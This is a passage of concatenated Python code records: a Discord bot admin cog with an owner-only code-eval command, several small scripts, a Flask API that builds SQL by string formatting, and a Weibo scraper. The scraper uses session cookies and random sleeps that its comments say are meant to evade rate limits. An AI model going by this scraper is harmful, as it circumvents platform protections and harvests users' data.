sys.stdout = stdout\n yield stdout\n sys.stdout = old\n\n\nclass Administration(commands.Cog):\n \"\"\"Administration commands that handle the management of the bot\"\"\"\n\n def __init__(self, bot) -> None:\n self.bot = bot\n self.session = self.bot.session\n self.db = self.bot.db\n\n @commands.command()\n @commands.is_owner()\n async def eval(self, ctx: commands.Context, *, code: str) -> None:\n \"\"\"Evaluates one or more lines of Python code. 
*BOT_OWNER\"\"\"\n\n guild_id = ctx.guild.id if ctx.guild else None\n\n variables = {\n \"bot\": self.bot,\n \"nextcord\": nextcord,\n \"commands\": commands,\n \"ctx\": ctx,\n \"players\": self.bot.music,\n \"player\": self.bot.music.get(guild_id),\n \"guild\": self.db.get_guild(guild_id),\n \"rooms\": self.bot.game,\n \"room\": self.bot.game.get(guild_id),\n \"Embed\": Embed,\n \"send_to_all_owners\": self.bot.send_to_all_owners,\n \"p\": print,\n }\n\n if code.startswith(\"```\") and code.endswith(\"```\"):\n code = \"\\n\".join(code.splitlines()[1:-1])\n\n try:\n lines = \"\\n\".join([f\" {i}\" for i in code.splitlines()])\n\n with stdout_io() as s:\n exec(f\"async def x():\\n{lines}\\n\", variables)\n await eval(\"x()\", variables)\n output = s.getvalue()\n except Exception as e:\n output = str(e)\n await ctx.message.add_reaction(\"❌\")\n else:\n await ctx.message.add_reaction(\"👌\")\n\n if output:\n msg_array = [output[i: i + 1900] for i in range(0, len(output), 1900)]\n\n embeds = [Embed(\"```py\\n\" + msg.strip(\"\\n\") + \"```\") for msg in msg_array]\n\n pagination = PaginationEmbed(ctx, embeds=embeds)\n pagination.embed.set_author(\n name=\"Python Interpreter\", icon_url=ICONS['python']\n )\n pagination.embed.set_footer(\n text=f\"Executed by {ctx.author}\", icon_url=ctx.author.display_avatar\n )\n await pagination.build()\n\n @commands.command()\n @commands.is_owner()\n async def generatelog(self, ctx: commands.Context) -> None:\n \"\"\"Generates a link contains the content of debug.log. *BOT_OWNER\"\"\"\n\n if not self.bot.env.str(\"PASTEBIN_API\"):\n await ctx.send(embed=Embed(\"Error. Pastebin API not found.\"))\n return\n\n with open(\"./debug.log\", \"r\") as f:\n text = f.read()\n res = await self.session.post(\n \"https://pastebin.com/api/api_post.php\",\n data={\n \"api_dev_key\": self.bot.env.str(\"PASTEBIN_API\"),\n \"api_paste_code\": text,\n \"api_option\": \"paste\",\n \"api_paste_private\": 1,\n \"paste_expire_date\": \"10M\",\n },\n )\n paste_link = await res.text()\n paste_id = paste_link.split(\"/\")[-1]\n await ctx.send(\n embed=Embed(f\"Generated pastebin: https://pastebin.com/raw/{paste_id}\")\n )\n\n @commands.command()\n @commands.has_guild_permissions(manage_messages=True)\n @commands.guild_only()\n async def prune(\n self,\n ctx: commands.Context,\n member: Optional[nextcord.Member] = None,\n count: int = 1,\n ) -> None:\n \"\"\"Deletes a number of messages of a specific member (if specified). *MANAGE_MESSAGES\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n\n if guild.get('deleteoncmd'):\n await self.bot.delete_message(ctx.message)\n\n async for message in ctx.history(limit=1000 if member else count):\n if count <= 0:\n break\n\n if not member or message.author == member:\n await self.bot.delete_message(message)\n count -= 1\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def prefix(self, ctx: commands.Context, prefix: str) -> None:\n \"\"\"Sets the prefix of the current server. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n await guild.update({'prefix': prefix})\n\n await ctx.send(embed=Embed(f\"Prefix is now set to `{guild.get('prefix')}`.\"))\n\n @commands.command()\n @commands.is_owner()\n async def setstatus(\n self,\n ctx: commands.Context,\n status: Required(\"online\", \"offline\", \"dnd\", \"idle\"), # type:ignore\n ) -> None:\n \"\"\"Sets the status of the bot. 
*BOT_OWNER\"\"\"\n\n if status is False:\n return\n\n await self.bot.settings.update({'status': status})\n\n await self.bot.change_presence(status=nextcord.Status[self.bot.settings.get('status')])\n await ctx.send(embed=Embed(f\"Status is now set to {self.bot.settings.get('status')}.\"))\n\n @commands.command()\n @commands.is_owner()\n async def setpresence(\n self,\n ctx: commands.Context,\n presence_type: Required(\"watching\", \"listening\", \"playing\"), # type:ignore\n *,\n name: str,\n ) -> None:\n \"\"\"Sets the presence of the bot. *BOT_OWNER\"\"\"\n\n if presence_type is False:\n return\n\n self.bot.settings.set('game', {\n 'type': presence_type,\n 'name': name\n })\n await self.bot.settings.save()\n\n await self.bot.change_presence(\n activity=nextcord.Activity(\n name=name, type=nextcord.ActivityType[self.bot.settings.get('game.type')]\n )\n )\n await ctx.send(\n embed=Embed(\n f\"Presence is now set to {self.bot.settings.get('game.type')} {self.bot.settings.get('game.name')}.\"\n )\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def alias(self, ctx: commands.Context, name: str, *, command: str) -> None:\n \"\"\"Sets or updates an alias command. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n aliases = guild.get('aliases')\n ids = [i for i, x in enumerate(aliases) if x.name == name]\n\n if any(ids):\n if int(aliases[ids[0]].owner) != ctx.author.id and await self.bot.is_owner(ctx.author):\n await ctx.send(\n embed=Embed(\"You are not the owner of the alias.\"), delete_after=5\n )\n return\n\n aliases[ids[0]].cmd = (\n command.replace(ctx.prefix, \"{0}\", 1)\n if command.startswith(ctx.prefix)\n else command\n )\n else:\n aliases.append(\n {\"name\": name, \"cmd\": command, \"owner\": ctx.author.id}\n )\n\n await guild.update({'aliases': aliases})\n await ctx.send(\n embed=Embed(f\"Message with exactly `{name}` will now execute `{command}`\"),\n delete_after=10,\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def deletealias(self, ctx: commands.Context, name: str) -> None:\n \"\"\"Removes an alias command. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n aliases = guild.get('aliases')\n\n ids = [i for i, x in enumerate(aliases) if x.name == name]\n\n if not ids:\n await ctx.send(embed=Embed(\"Alias doesn't exists.\"), delete_after=5)\n return\n\n if int(aliases[ids[0]].owner) != ctx.author.id and await self.bot.is_owner(\n ctx.author\n ):\n await ctx.send(\n embed=Embed(\"You are not the owner of the alias.\"), delete_after=5\n )\n return\n\n del aliases[ids[0]]\n\n await guild.update({'aliases': aliases})\n await ctx.send(embed=Embed(f\"Alias`{name}` has been deleted.\"), delete_after=5)\n\n @commands.command()\n @commands.is_owner()\n @commands.guild_only()\n async def deleteoncmd(self, ctx: commands.Context) -> None:\n \"\"\"\n Enables/Disables the deletion of message after execution. *BOT_OWNER\n \"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n await guild.update({'deleteoncmd': not guild.get('deleteoncmd')})\n\n await ctx.send(\n embed=Embed(\n f\"Delete on command is now set to {'enabled' if guild.get('deleteoncmd') else 'disabled'}.\"\n )\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def voicetts(self, ctx: commands.Context) -> None:\n \"\"\"Enables/Disables Voice TTS. 
*ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.voicetts', ctx.channel.id if guild.get('channel.voicetts') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.voicetts'):\n await ctx.send(embed=Embed(\"Voice TTS is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Voice TTS is now disabled.\"))\n\n @commands.group(invoke_without_command=True)\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def logger(self, ctx: commands.Context) -> None:\n \"\"\"Enables/Disables Logger. *ADMINISTRATOR\"\"\"\n\n await ctx.send(embed=Embed(\"Incomplete command. \"))\n\n @logger.command(name=\"presence\")\n async def logger_presence(self, ctx: commands.Context) -> None:\n \"\"\"Logs presence when someone joins/leaves the guild or voice channel and status updates.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.presence_log',\n ctx.channel.id if guild.get('channel.presence_log') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.presence_log'):\n await ctx.send(embed=Embed(\"Logger Presence is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Presence is now disabled.\"))\n\n @logger.command(name=\"voice\")\n async def logger_voice(self, ctx: commands.Context) -> None:\n \"\"\"Logs presence when someone joins/leaves the voice channel.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.voice_log', ctx.channel.id if guild.get('channel.voice_log') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.voice_log'):\n await ctx.send(embed=Embed(\"Logger Voice is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Voice is now disabled.\"))\n\n @logger.command(name=\"message\")\n async def logger_message(self, ctx: commands.Context) -> None:\n \"\"\"Logs messages when someone delete his message.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.msgdelete', ctx.channel.id if guild.get('channel.msgdelete') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.msgdelete'):\n await ctx.send(embed=Embed(\"Logger Message is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Message is now disabled.\"))\n\n @commands.command()\n @commands.is_owner()\n async def update(self, ctx: commands.Context) -> None:\n \"\"\"Updates the bot from github. *BOT_OWNER\"\"\"\n\n result = await shell_exec(\"git pull\")\n\n embed = Embed()\n embed.set_author(\n name=\"Github Update\",\n icon_url=ICONS[\"github\"]\n )\n\n embed.description = result\n\n await ctx.send(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def pipupdate(self, ctx: commands.Context) -> None:\n \"\"\"Updates the package of the bot. *BOT_OWNER\"\"\"\n\n msg = await ctx.send(embed=Embed(\"Bot packages updating...\"))\n\n embed = Embed()\n embed.set_author(name=\"Pipenv Update\", icon_url=ICONS['pip'])\n\n embed.description = await self.bot.update_package('nextcord', 'yt-dlp')\n\n await msg.edit(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx: commands.Context, *, ext: str = None) -> None:\n \"\"\"Reloads a specific or all extension. 
*BOT_OWNER\"\"\"\n\n extensions = self.bot.extensions.keys() if ext is None else [\"neonbot.cogs.\" + ext]\n\n try:\n for extension in list(extensions):\n self.bot.reload_extension(extension)\n except Exception as e:\n await ctx.send(embed=Embed(str(e)))\n else:\n msg = \"Reloaded all modules\" if ext is None else f\"Reloaded module: {ext}.\"\n log.info(msg)\n await ctx.send(embed=Embed(msg))\n\n @commands.command()\n @commands.is_owner()\n async def restart(self, ctx: commands.Context) -> None:\n \"\"\"Restarts bot. *BOT_OWNER\"\"\"\n\n self.bot.save_music()\n msg = await ctx.send(embed=Embed(\"Bot Restarting...\"))\n with open(\"./tmp/restart_config.json\", \"w\") as f:\n json.dump({\"message_id\": msg.id, \"channel_id\": ctx.channel.id}, f, indent=4)\n await self.bot.restart()\n\n @commands.command()\n @commands.has_guild_permissions(mute_members=True)\n async def servermute(self, ctx: commands.Context, member: nextcord.Member, time: str, *, reason: str = \"\") -> None:\n \"\"\"Server mute with timer.\"\"\"\n\n if member.voice is None:\n await ctx.send(embed=Embed(f\"{member} is not in voice.\"))\n return\n\n if member.voice.mute is True:\n await ctx.send(embed=Embed(f\"{member} is already muted.\"))\n return\n\n seconds = convert_to_seconds(time)\n\n await member.edit(mute=True, reason=reason)\n await ctx.send(embed=Embed(f\"{member} has been muted for {seconds} seconds.\"))\n\n async def unmute():\n await asyncio.sleep(seconds)\n if member.voice.mute is True:\n await member.edit(mute=False, reason='Revert unmute')\n await ctx.send(embed=Embed(f\"{member} is now unmuted.\"))\n\n self.bot.loop.create_task(unmute())\n\n @commands.command()\n @commands.has_guild_permissions(mute_members=True)\n async def serverunmute(self, ctx: commands.Context, member: nextcord.Member, *, reason: str = \"\") -> None:\n \"\"\"Server unmute.\"\"\"\n\n if member.voice is None:\n await ctx.send(embed=Embed(f\"{member} is not in voice.\"))\n return\n\n if member.voice.mute is False:\n await ctx.send(embed=Embed(f\"{member} is already unmuted.\"))\n return\n\n await member.edit(mute=False, reason=reason)\n await ctx.send(embed=Embed(f\"{member} has been unmuted.\"))\n\n\ndef setup(bot: commands.Bot) -> None:\n bot.add_cog(Administration(bot))\n","sub_path":"neonbot/cogs/administration.py","file_name":"administration.py","file_ext":"py","file_size_in_byte":15399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"640369273","text":"# import necessary packages\nfrom os import path\n\nDATASETS_DIR = \"dataset\"\nSCRIPTS_DIR = \"scripts\"\nHELPERS_DIR = \"helpers\"\nMODELS_DIR = \"models\"\nOUTPUT_DIR = \"output\"\nIMAGES_DIR = path.sep.join([OUTPUT_DIR, \"images\"])\nLABELS_DIR = path.sep.join([OUTPUT_DIR, \"labels\"])\n\nDATASET_NAME = \"ukbench100\"\nINPUT_DB_NAME = \"inputs.hdf5\"\nOUTPUT_DB_NAME = \"outputs.hdf5\"\nMODEL_NAME = \"srcnn.model\"\nPLOT_NAME = \"plot.png\"\n\nDATASET_PATH = path.sep.join([DATASETS_DIR, DATASET_NAME])\nINPUT_DB_PATH = path.sep.join([OUTPUT_DIR, INPUT_DB_NAME])\nOUTPUT_DB_PATH = path.sep.join([OUTPUT_DIR, OUTPUT_DB_NAME])\nMODEL_PATH = path.sep.join([MODELS_DIR, MODEL_NAME])\nPLOT_PATH = path.sep.join([OUTPUT_DIR, PLOT_NAME])\n\n# initialize the batch size and number of epochs for training\nBATCH_SIZE = 32\nNUM_EPOCHS = 10\n\n# initialize the scale and the input dimensions\nSCALE = 2.0\nINPUT_DIM = 33\n\n# the label size should ne the output spatial dimensions of\n# the srcnn, while the padding ensures we properly crop the 
labels\n# ROI\nLABEL_SIZE = 21\nPAD = int((INPUT_DIM - LABEL_SIZE) / 2.0)\n\n# the stride controls the step size of the sliding window\nSTRIDE = 14\n\nBUILD_ENABLED = False\nBUILD_SCRIPT = path.sep.join([SCRIPTS_DIR, \"build_dataset.py\"])\nBUILD_DESC = \"build the dataset\"\nBUILD_ARGS = [[\"input-images\", DATASET_PATH],\n [\"labels\", LABELS_DIR],\n [\"output-images\", IMAGES_DIR],\n [\"input-db\", INPUT_DB_PATH],\n [\"output-db\", OUTPUT_DB_PATH],\n [\"scale\", SCALE],\n [\"input-dim\", INPUT_DIM],\n [\"stride\", STRIDE],\n [\"padding\", PAD],\n [\"label-size\", LABEL_SIZE]]\n\nTRAIN_ENABLED = True\nTRAIN_SCRIPT = path.sep.join([SCRIPTS_DIR, \"train_model.py\"])\nTRAIN_DESC = \"train the model to upgrade the resolution of pictures\"\nTRAIN_ARGS = [[\"input-db\", INPUT_DB_PATH],\n [\"output-db\", OUTPUT_DB_PATH],\n [\"input-dim\", INPUT_DIM],\n [\"batch-size\", BATCH_SIZE],\n [\"epochs\", NUM_EPOCHS],\n [\"model-path\", MODEL_PATH],\n [\"plot-path\", PLOT_PATH]]\n","sub_path":"DNN/dnn-improc/image-super-resolution/conf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"535983611","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/pybasic/__main__.py\n# Compiled at: 2019-04-20 06:42:58\n# Size of source mod 2**32: 1304 bytes\nimport argparse, pickle, sys\nfrom .basic_yacc import ast, parser, root_stack\nfrom .utils import BasicError\nfrom .pybasic import *\n\ndef main():\n arg_parser = argparse.ArgumentParser(description='Execute pybasic programs, or start an REPL session.')\n arg_parser.add_argument('program_name', nargs='?', help='The path of the source program to execute. If not specified, an REPL session will be started.')\n arg_parser.add_argument('-a', '--ast', action='store_true', dest='ast', help='Execute a binary abstract syntax tree file rather than a source program. This will be ignored in REPL mode. ')\n arg_parser.add_argument('-s', '--save', action='store', dest='ast_path', help='Save the binary abstract syntax tree of the source program to the given path. The source program will not be executed. This will be ignored in REPL mode. 
')\n args = arg_parser.parse_args()\n if not args.program_name:\n repl()\n else:\n if args.ast_path:\n save_ast(args.program_name, args.ast_path)\n return\n if args.ast:\n execute_ast(args.program_name)\n return\n execute(args.program_name)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/ply_pybasic-1.0-py3.7/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647840567","text":"from datetime import datetime\nfrom sys import argv\nfrom typing import Dict\n\n# Custom types:\nPuns = Dict[str, str]\n\n\nclass ContentUpdate:\n\n multiplier: float = 1\n\n def __init__(self, author: str, days_to_event: int) -> None:\n self.author: str = author\n self.days_to_event: int = days_to_event\n\n\nclass LectureUpdate(ContentUpdate):\n pass\n\n\nclass LabUpdate(ContentUpdate):\n\n multiplier = 0.5\n\n\nclass Meggie:\n name: str = \"Meggie\"\n base_coffee_need: int = 2\n total_content_cost: float = 0\n\n def __init__(self, time_in: int) -> None:\n self.time_in: int = time_in\n\n def compute_puns(self, puns: Puns) -> None:\n pun_factor: int = 1\n pun_cost: int = 0\n for punster, pun in puns.items():\n if punster == \"Romain\":\n pun_factor += 2\n pun_cost += len(punster) + pun_factor * len(pun)\n\n self.pun_cost = pun_cost\n\n def compute_content_update(self, content_update: ContentUpdate) -> None:\n content_cost: float = 2 / (content_update.days_to_event + 1)\n if content_update.author == \"Romain\":\n content_cost += 1\n content_cost = content_cost * content_update.multiplier\n self.total_content_cost = content_cost\n\n def compute_day_of_week(self, date: datetime) -> float:\n day: int = date.weekday()\n if day > 5:\n return 0\n else:\n day_cost: float = day / 1.5\n return day_cost\n\n def meggulate(self) -> float:\n coffee_needed: float = float(self.base_coffee_need)\n coffee_needed += max(10 - self.time_in, 0) * 0.75\n coffee_needed += self.pun_cost * 0.01\n coffee_needed += self.total_content_cost\n return coffee_needed\n\n\ntime_in: int = int(argv[1])\nmeggie: Meggie = Meggie(time_in)\npuns: Puns = {\n \"Henry\": \"Romain's puns are better percolate than never\",\n \"Romain\": \"My coffee jokes have never bean better\",\n \"Ashley\": \"Romain's coffee puns are esprecious\",\n}\nmeggie.compute_puns(puns)\nmeggie.compute_content_update(LectureUpdate(\"Romain\", 2))\nmeggie.compute_content_update(LabUpdate(\"Ashley\", 7))\ncoffee_needed: float = meggie.meggulate()\ncoffee_needed += meggie.compute_day_of_week(datetime.today())\ncoffee_needed = round(coffee_needed, 1)\nprint(f\"{meggie.name} needs {coffee_needed} cups of coffee.\")\n","sub_path":"meggulator/06_meggulator_custom_type.py","file_name":"06_meggulator_custom_type.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245620811","text":"import threading\n\nimport httpbin\nfrom werkzeug.serving import BaseWSGIServer\n\n\ndef start_app(app, ssl):\n server = BaseWSGIServer(host='localhost', port=0, app=app)\n server.my_extra = None\n thread = threading.Thread(target=server.serve_forever, daemon=True)\n thread.start()\n return server\n\nhttp_port = start_app(httpbin.app, False).server_port\n","sub_path":"curl_requests/tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 
+{"seq_id":"647996794","text":"import time\nimport board\nimport neopixel\n\npixel_pin = board.D18\nnum_pixels = 147\norder = neopixel.RGB\n\npixels = neopixel.NeoPixel(\n pixel_pin,\n num_pixels,\n brightness=0.5,\n auto_write=False,\n pixel_order=order\n)\n\npixels[0] = (255, 0, 0)\npixels.show()\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n print('Pixels: ', (r, g, b))\n return (r, g, b) if order in (neopixel.RGB, neopixel.GRB) else (r, g, b, 0)\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n print('Showing new pixel colors')\n pixels.show()\n time.sleep(wait)\n\nwhile True:\n print('Showing red')\n pixels.fill((255, 0, 0))\n pixels.show()\n time.sleep(1)\n\n print('Showing green')\n pixels.fill((0, 255, 0))\n pixels.show()\n time.sleep(1)\n \n print('Showing blue')\n pixels.fill((0, 0, 255))\n pixels.show()\n time.sleep(1)\n\n rainbow_cycle(0.001)\n","sub_path":"python/led_test.py","file_name":"led_test.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600801072","text":"#coding=utf-8\nimport itchat\nimport datetime\nimport time\nimport random\n\ntoUserNames=[\n #\"凯月\",\n #\"凯月同桌\",\n \"狗狗\",\n \"深圳徒弟\",\n \"糖果\",\n #\"李志杰\",\n #\"骚军\",\n \"乔乔\",\n \"陈陈\",\n \"大妹\",\n \"小妹\",\n \"芯梦\"\n]\n\ntimes = [\n {'h':8,'m':2,'msg':[\n #'早',\n '早安'\n ]}\n]\n\ndef send_move(saytimemsg): \n for touser in toUserNames:\n saytimemsglength = len(saytimemsg)\n rand = random.randint(0,saytimemsglength-1)\n users = itchat.search_friends(name=touser)\n if(len(users)>0):\n itchat.send(saytimemsg[rand],toUserName=users[0]['UserName'])\n\n\nif __name__ == \"__main__\":\n itchat.auto_login(hotReload=True,enableCmdQR=2) # 首次扫描登录后后续自动登录\n\nwhile True:\n now = datetime.datetime.now()\n if(now.hour == 1 and now.minute == 0):\n for saytime in times:\n saytime['m'] = random.randint(0,15)\n for saytime in times:\n if(now.hour == saytime['h'] and now.minute == saytime['m']):\n saytimemsg = saytime['msg']\n send_move(saytimemsg)\n # 每隔60秒检测一次\n time.sleep(60)\n","sub_path":"python/pythonwx/sendwx.py","file_name":"sendwx.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548352602","text":"from flask import Response\nfrom flask import jsonify\nfrom flask import abort\nfrom flask import request\nfrom db.connection import Connect\nfrom datetime import datetime\nfrom db.model import SSDokumanlarModel\n\nclass SSDokumanlar():\n def __init__(self, modelClass):\n self.conn = Connect()\n self.session = self.conn.session()\n self.model = modelClass\n\n def __del__(self):\n self.session.close()\n\n def getSS(self, cid):\n try:\n dict = []\n dictDetay = [] # Dokumanlar\n\n sql = \"\"\"\n select pidm birim_pidm, name birim_name\n from birimler\n where cid=%d\n \"\"\"%(cid)\n\n data = self.session.execute(sql)\n\n for row in data:\n dictDetay = self.getSSDetay(row.birim_pidm, cid)\n dict.append({'birim_pidm':row.birim_pidm ,'birim_name':row.birim_name, 'dokumanlar':dictDetay})\n\n _json = jsonify(dict)\n\n if (len(dict) == 0):\n return Response([])\n else:\n return _json\n\n except 
Exception as e:\n            return Response(\"DB SQL Exception! \",e)\n\n\n    def getSSDetay(self, birim_pidm, cid): # documents\n        try:\n            dict = []\n\n            sql = \"\"\"\n                select pidm,\n                    dokuman_name,\n                    yayin_name\n                from view_ssdokumanlar\n                where birim_pidm=%d and cid=%d\n            \"\"\"%(birim_pidm, cid)\n\n            data = self.session.execute(sql)\n\n            for row in data:\n                # dict.append({'pidm':row.pidm, 'birim':row.birim, 'kurum':row.kurum,'timestamp':row.timestamp})\n                dict.append({'pidm':row.pidm,'dokuman_name':row.dokuman_name, 'yayin_name':row.yayin_name})\n\n            return dict\n\n        except Exception as e:\n            return Response(\"DB SQL Exception! \",e)\n\n    def add(self):\n        try:\n            self.session.add(self.model)\n            self.session.commit()\n            print(\"Add Successfully\")\n            return '', 204\n        except Exception as e:\n            return Response(\"SSDokumanlar DB Add Exception! \",e)\n\n    def delete(self):\n        try:\n            _pidm = int(self.model.pidm)\n            _cid = int(self.model.cid)\n            row = self.session.query(\n                self.model.__class__).filter_by(pidm=_pidm, cid=_cid).one()\n            self.session.delete(row)\n            self.session.commit()\n            return '', 204\n        except Exception as err:\n            print(\"DB Error on deleting \", err)\n            return '', 404\n\n\ndef getSSDokumanlar(cid):\n    cc = SSDokumanlar(SSDokumanlarModel)\n    return cc.getSS(cid)\n\ndef addSSDokuman(form):\n    _birim_pidm = form.get('birim_pidm')\n    _dokuman_pidm = form.get('dokuman_pidm')\n    _yayin_pidm = form.get('yayin_pidm')\n    _cid = form.get('cid')\n    _uid = form.get('uid')\n\n    cc=SSDokumanlar(SSDokumanlarModel(birim_pidm=_birim_pidm, dokuman_pidm=_dokuman_pidm, yayin_pidm=_yayin_pidm, cid=_cid, uid=_uid))\n\n    return cc.add()\n\ndef delSSDokuman(form):\n    _pidm = form.get('pidm')\n    _cid = form.get('cid')\n\n    cc=SSDokumanlar(SSDokumanlarModel(pidm=_pidm, cid=_cid))\n\n    return cc.delete()","sub_path":".vscode/api/ss/ssdokumanlar.py","file_name":"ssdokumanlar.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324126895","text":"# -*- coding: utf-8 -*-\n\nfrom random import random\n\nimport json\n\nimport random\nimport re\nimport sys\nimport traceback\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom time import sleep\nimport requests\nimport scrapy\nfrom lxml import etree\nfrom tqdm import tqdm\nfrom crawler.items import WeiboUserItem\n\n\nclass Weibo(scrapy.Spider):\n    name = 'weibo'\n    allowed_domains = ['weibo.cn']\n    start_urls = ['https://weibo.cn/u/5829543885']\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        self.filter = 1\n        self.got_num = 0  # number of weibo posts fetched\n        self.weibo = []\n        itemDict = {}\n        try:\n            with open('cookie.json') as f:\n                self.cookie_json = json.loads(f.read())\n        except:\n            self.cookie = {}\n\n        items = self.cookie_json['Cookie'].split(';')\n        for item in items:\n            key = item.split('=')[0].replace(' ', '')\n            value = item.split('=')[1]\n            itemDict[key] = value\n        self.cookie = itemDict\n        self.cookie_str = itemDict\n        print(self.cookie)\n\n    def start_requests(self):\n        start_url = 'https://weibo.cn/u/5829543885'\n        cookie = self.cookie\n        headers = {\n            'Connection': 'keep - alive',\n            'User-Agent': self.cookie_json[\"user-agent\"]\n        }\n        yield scrapy.Request(url=start_url, headers=headers, cookies=cookie)\n\n    def parse(self, response):\n        item = WeiboUserItem()\n        self.user_id = int(response.url.split('/')[-1])\n        item['user_id'] = self.user_id  # user id, i.e. the number we input; e.g. the id for the nickname “Dear-迪丽热巴” is 1669879400\n        item['nickname'] = response.xpath(\"//title/text()\").extract_first()[0:-3]  # user nickname, e.g. “Dear-迪丽热巴”\n\n        user_info = 
response.xpath(\"//div[@class='tip2']/*/text()\").extract()\n\n item['weibo_num'] = int(user_info[0][3:-1]) # 用户全部微博数\n item['following'] = int(user_info[1][3:-1]) # 用户关注数\n item['followers'] = int(user_info[2][3:-1]) # 用户粉丝数\n\n page_num = self.get_page_num(response) # 获取微博总页数\n print(page_num)\n page1 = 0\n random_pages = random.randint(1, 5)\n for page in tqdm(range(1, page_num + 1), desc=u\"进度\"):\n self.get_one_page(page) # 获取第page页的全部微博\n\n # 通过加入随机等待避免被限制。爬虫速度过快容易被系统限制(一段时间后限\n # 制会自动解除),加入随机等待模拟人的操作,可降低被系统限制的风险。默\n # 认是每爬取1到5页随机等待6到10秒,如果仍然被限,可适当增加sleep时间\n if page - page1 == random_pages:\n sleep(random.randint(6, 10))\n page1 = page\n random_pages = random.randint(1, 5)\n\n if not self.filter:\n print(u\"共爬取\" + str(self.got_num) + u\"条微博\")\n else:\n print(u\"共爬取\" + str(self.got_num) + u\"条原创微博\")\n\n item['got_num'] = self.got_num # 爬取到的微博数\n item['weibo'] = self.weibo\n\n yield item\n\n def get_page_num(self, response):\n \"\"\"获取微博总页数\"\"\"\n try:\n if response.xpath(\"//input[@name='mp']\") == []:\n page_num = 1\n else:\n page_num = (int)(\n response.xpath(\"//input[@name='mp']\")[0].attrib[\"value\"])\n return page_num\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_one_page(self, page):\n \"\"\"获取第page页的全部微博\"\"\"\n try:\n url = \"https://weibo.cn/u/%d?page=%d\" % (self.user_id, page)\n selector = self.deal_html(url)\n info = selector.xpath(\"//div[@class='c']\")\n is_empty = info[0].xpath(\"div/span[@class='ctt']\")\n if is_empty:\n for i in range(0, len(info) - 2):\n is_retweet = info[i].xpath(\"div/span[@class='cmt']\")\n if (not self.filter) or (not is_retweet):\n self.weibo.append({})\n self.get_weibo_content(info[i]) # 微博内容\n self.get_weibo_place(info[i]) # 微博位置\n self.get_publish_time(info[i]) # 微博发布时间\n self.get_publish_tool(info[i]) # 微博发布工具\n self.get_weibo_footer(info[i]) # 微博点赞数、转发数、评论数\n self.got_num += 1\n print(\"-\" * 100)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def deal_html(self, url):\n \"\"\"处理html\"\"\"\n try:\n html = requests.get(url, cookies=self.cookie).content\n selector = etree.HTML(html)\n return selector\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def deal_garbled(self, info):\n \"\"\"处理乱码\"\"\"\n try:\n info = info.xpath(\n \"string(.)\").replace(u\"\\u200b\", \"\").encode(sys.stdout.encoding, \"ignore\").decode(\n 